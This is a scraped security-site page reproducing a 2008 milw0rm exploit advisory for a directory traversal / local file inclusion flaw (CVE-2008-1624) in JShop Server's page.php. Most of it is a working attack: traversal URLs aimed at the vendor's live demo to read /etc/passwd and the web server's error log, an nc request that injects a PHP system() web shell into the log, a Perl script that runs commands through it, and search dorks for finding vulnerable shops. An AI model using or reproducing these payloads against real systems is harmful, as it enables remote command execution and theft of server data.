php 目录遍历漏洞,CVE-2008-1624 JShop Server 'v2demo/page.php' 目录遍历漏洞漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客，安全资讯平台...

JShop 1.x-2.x local file include

---------------------------------------------------------------------------------------------------------------------

+ scripts:Jshop Server 1.x-2.x +

+ Discovered By :v0l4arrra +

+ url: www.jshop.co.uk +

+ dork:"powered by jshop" and also usefull one "allinurl:jssCart=.." +

---------------------------------------------------------------------------------------------------------------------

Go to www.jshop.co.uk and check out demo version...

http://www.jshopecommerce.com/v2demo/page.php?xPage=../../../../../../../../../../../../../etc/passwd%00

Then u can upload for example the gif file like this

$cat 1.gif

GIF89aD

or do it like me:

$nc www.jshopecommerce.com 80

GET <?php echo ''; echo system($_GET['cmd']); echo ''; ?> HTTP/1.1

Host: www.jshopecommerce.com

................................................................................................................

and simple parse the output of error log with lame perl script:

#!/usr/bin/env perl

use strict; use warnings;

#####################################

# This script download log file #

# and grep the result of the #

# command in tags .. #

# and print it.. #

#####################################

use LWP::UserAgent;

use HTTP::Request::Common;

$| = 1;

my $url = $ARGV[0] or print "usage: $0 http://127.0.0.1/vuln.php?page=../../../../../var/log/access.log%00&cmd=ls+-lisa\n" and exit;

my $ua= new LWP::UserAgent;

$ua->agent("Mozilla/5.0");

my $request = new HTTP::Request( 'GET' => $url );

my $document = $ua->request($request);

my $response = $document->as_string;

$response =~ m%(.*?)%is;

print $1,"\n";

######################################

so dont waste your time and check it now

http://www.jshopecommerce.com/v2demo/page.php?xPage=../../../../../../../../../../etc/httpd/logs/error_log%00&cmd=ls+-lisa

##########################################

# milw0rm.com [2008-03-30]